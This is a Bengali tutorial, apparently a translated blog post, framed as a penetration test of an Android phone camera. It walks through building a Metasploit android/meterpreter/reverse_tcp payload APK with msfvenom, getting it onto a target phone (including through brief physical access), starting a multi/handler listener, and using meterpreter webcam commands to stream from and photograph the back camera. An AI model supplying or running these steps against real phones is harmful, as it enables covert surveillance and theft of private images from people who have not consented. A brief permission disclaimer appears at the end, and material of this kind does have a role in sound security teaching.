হ্যাকাররা তাদের ব্যবহারকারীদের কাছ থেকে লুকিয়ে রাখার জন্য অ্যান্ড্রয়েড ফোনের ক্যামেরা ছিনতাই করে বা তাদের জাল ছবি সরবরাহ করার বেশ কয়েকটি খবর পাওয়া গেছে। একজন সতর্ক ফোনের মালিক হিসাবে, আপনি হয়ত এই ধরনের হুমকি ইভেন্টের সম্ভাবনা এবং সত্যিকারের ঝুঁকি মূল্যায়ন করে এটি প্রতিরোধ করতে চাইছেন।
একটি অনুপ্রবেশ পরীক্ষার মাধ্যমে আপনার অ্যান্ড্রয়েড ফোন ক্যামেরার সম্ভাব্য দুর্বলতাগুলি পরীক্ষা করার জন্য কালি লিনাক্স হল অন্যতম সেরা সরঞ্জাম। এটি আপনাকে ফোন ক্যামেরা দূরবর্তীভাবে অ্যাক্সেস করার যেকোনো হ্যাকার প্রচেষ্টার শীর্ষে থাকতে সাহায্য করতে পারে।
একটি এক্সপ্লয়েট পেলোড ইনস্টল করা
একটি অনুপ্রবেশ পরীক্ষার জন্য কালি লিনাক্স ব্যবহার করতে, প্রথমে এটির অফিসিয়াল সাইট থেকে ডাউনলোড করুন। “msfvenom,” “msfconsole,” “meterpreter” এবং আরও অনেক কিছুর সংজ্ঞার জন্য এই আগের টিউটোরিয়ালটি পড়ুন যা এই অনুশীলনে ব্যবহার করা হবে।
অনুপ্রবেশ পরীক্ষার প্রথম ধাপ হল ডিভাইসে একটি স্ট্যান্ডার্ড এক্সপ্লয়েট পেলোড ইনস্টল করা। এর জন্য, কালি লিনাক্স টার্মিনাল খুলুন এবং নিম্নলিখিত কমান্ডটি লিখুন:ifconfig . এটি আপনাকে আপনার কালি লিনাক্স সেশনের আইপি ঠিকানা দেবে।
এখন উপরের আইপি ঠিকানাটি ব্যবহার করে নীচে দেখানো কমান্ডটি প্রবেশ করুন। শোষণ, ট্রোজান এবং অন্যান্য দুর্বলতার জন্য পোর্ট নম্বর সাধারণত 4444 হিসাবে দেওয়া হয়।
msfvenom - p android/meterpreter/reverse_tcp L HOST=IP address LPORT=Number R > Payload.apk
এই ধাপে একটি মেটাসপ্লয়েট পেলোড ইনজেক্ট করার চেষ্টা করুন, যা একটি জাভা ইন্টারপ্রেটারের উপর ভিত্তি করে। সফল হলে, অনুপ্রবেশ পরীক্ষা আপনাকে যাচাই করতে সাহায্য করবে যে আপনার ফোন ফোন কল শোনা, SMS অ্যাক্সেস করা, ব্যবহারকারীর ভূ-লোকেটিং ইত্যাদির জন্য দুর্বল কিনা।
এই ক্ষেত্রে ফোনের ক্যামেরা অ্যাক্সেস করার জন্য কীভাবে শোষণকে ব্যবহার করা যেতে পারে তা দেখানোর চেষ্টা করা হয়।
একবার শোষণ শুরু হলে, রুট ফোল্ডারে "পেলোড" নামে একটি APK ফাইল ইনস্টল করা হবে। আপনি একটি লক্ষ্য Android ফোনে এটি ইনস্টল করতে হবে. যাইহোক, এটি সম্পন্ন করার চেয়ে বলা সহজ। বেশিরভাগ নতুন অ্যান্ড্রয়েড ফোন এবং ইমেল এই ধরনের ম্যালওয়্যার সংক্রামিত ফাইল বহন করতে অস্বীকার করবে, এবং এটি একটি ভাল জিনিস।
যাইহোক, এটি এখনও একটি USB কেবল বা অস্থায়ী ফাইলের মাধ্যমে অর্জন করা যেতে পারে। যদি কোনো হ্যাকার আপনার ফোনে কয়েক মিনিটের জন্য অ্যাক্সেস থাকে, তাহলে এটি কিছুটা দুর্বল হয়ে পড়ে। এই অনুপ্রবেশ পরীক্ষায় এখানে আমাদের প্রচেষ্টা জড়িত ঝুঁকির সুনির্দিষ্ট পরিমাণ নির্ধারণ করা।
একবার স্থানান্তরিত হলে, আপনাকে আপনার ফোনে পেলোড ফাইল ইনস্টল করার একটি উপায় খুঁজে বের করতে হবে। এটি একটি খুব পুরানো অ্যান্ড্রয়েড সংস্করণ না হলে, APK ইনস্টল করার আগে আপনার ফোনে আপনাকে বেশ কয়েকটি সতর্কতা দেওয়া উচিত। তবুও, অ্যান্ড্রয়েড ফোন সংস্করণ যাই হোক না কেন, একটি অ্যান্ড্রয়েড ফোনে অজানা উত্স থেকে অ্যাপগুলি ইনস্টল করার আরও অনেক উপায় রয়েছে৷
শোষণ চালু করা হচ্ছে
উপরের পেলোড শোষণ চালু করতে, নিম্নলিখিত কমান্ডটি প্রবেশ করান:msfconsole . কমান্ডটি কার্যকর হতে মাত্র কয়েক সেকেন্ড সময় লাগবে এবং ফোনের ক্যামেরায় আরও অনুপ্রবেশ পরীক্ষার জন্য মেটাসপ্লয়েট প্রস্তুত করা যেতে পারে।
মেটাস্প্লয়েট তার নিজস্ব সম্পূর্ণ বিবরণ দেবে। পেলোড সারাংশও দৃশ্যমান। এটি কর্মক্ষেত্রে শোষণের সংখ্যা দেখায়।
পরবর্তী ধাপে msfconsole শোষণ চালু করতে প্রস্তুত। এর জন্য, আগে আলোচিত IP ঠিকানা এবং পোর্ট নম্বর (4444) দেখুন। তদনুসারে, নিম্নলিখিত কমান্ডগুলি লিখুন:
exploit (multi/handler) > set LHOST "IP Address" [ENTER] set LPORT "Port number" [ENTER] exploit [ENTER]
যখন বিপরীত TCP হ্যান্ডলার সক্রিয় করা হয়, তখন আপনি মিটারপ্রেটার নিজেই চালু হওয়ার বিভিন্ন ধাপ দেখতে পাবেন। এটি লক্ষ্য ফোন নির্ণয় করার সময় কয়েক সেকেন্ডের জন্য অপেক্ষা করুন.
এখানে উল্লেখ করা দরকার যে বেশিরভাগ আধুনিক অ্যান্ড্রয়েড ফোনগুলি এই অ্যাক্সেস অস্বীকার করতে থাকবে। মনে রাখবেন এটি একটি অনুপ্রবেশ পরীক্ষা। যদি আপনার অ্যান্ড্রয়েড ফোনটি এই প্রাণঘাতী APK ফাইলটি ব্যবহার করে অনুপ্রবেশ করা না যায়, তাহলে এর অর্থ হল আপনার ফোন নির্মাতা এই বিশেষ আক্রমণ ভেক্টর সম্পর্কে সচেতন।
অ্যান্ড্রয়েড ফোনের ক্যামেরা অ্যাক্সেস করা
আপনি সফলভাবে ফোনে শোষণ সন্নিবেশ করতে সক্ষম হলে, এটি এখন অনুপ্রবেশ করা যেতে পারে একটি সুযোগ আছে. যখন এটি ঘটবে, একটি কালি লিনাক্স টার্মিনালের "মিটারপ্রেটার" ফোনের সাথে একটি সংযোগ স্থাপন করতে সক্ষম হবে৷ এই সময়ে, help ঢোকান আক্রমণের অধীনে অ্যান্ড্রয়েড ফোনের মধ্যে একাধিক বিকল্প অ্যাক্সেস করতে।
আপনার ফোনের ক্যামেরা অ্যাক্সেস করতে নিম্নলিখিত কমান্ডগুলি লিখুন (হেল্প মেনু থেকে)। এই শোষণে টার্মিনাল থেকে ছবি তোলার জন্য পিছনের ক্যামেরা অ্যাক্সেস করার চেষ্টা করা হয়েছিল।
webcam_list [ENTER] 1. Back camera 2. Front camera [ENTER] webcam_stream -i 1
একটি সফল অনুপ্রবেশ পরীক্ষা সম্পূর্ণ করতে, একবার আপনি ক্যামেরা অ্যাক্সেস করতে সক্ষম হলে, একটি ছবি তুলুন এবং এটি কালি লিনাক্স রুট ফোল্ডারে সংরক্ষণ করুন। এছাড়াও আপনি সংরক্ষিত অন্যান্য ছবি সম্পাদনা, পুনঃনামকরণ বা মুছে ফেলতে পারেন। অতএব, পরীক্ষিত ফোনে যেকোন সফল অনুপ্রবেশ একটি সত্যিকারের আক্রমণের সম্ভাবনার উপর একটি ওয়েক-আপ কল, যার মানে এটি একটি নিরাপত্তা প্যাচের জন্য যাওয়ার সময়।
এই টিউটোরিয়ালে আপনি শিখেছেন কীভাবে একটি কালি লিনাক্স টার্মিনাল থেকে পেনিট্রেশন পরীক্ষার জন্য অ্যান্ড্রয়েড ক্যামেরা অ্যাক্সেস করা যায়।
এটি একটি নিরাপত্তা গবেষণা নিবন্ধ. আপনি যদি কোনও প্রদর্শনের জন্য অন্য কারও ক্যামেরা অ্যাক্সেস করেন তবে সর্বদা প্রথমে তাদের অনুমতি নিন - যদি না, অবশ্যই, এটি আপনার নিজের ফোন। আপনার ফোনের দুর্বলতাগুলি পরীক্ষা করতে এবং খুঁজে পেতে সহায়তা করার জন্য অ্যান্ড্রয়েডের জন্য এই হ্যাকিং অ্যাপগুলি দেখতে ভুলবেন না
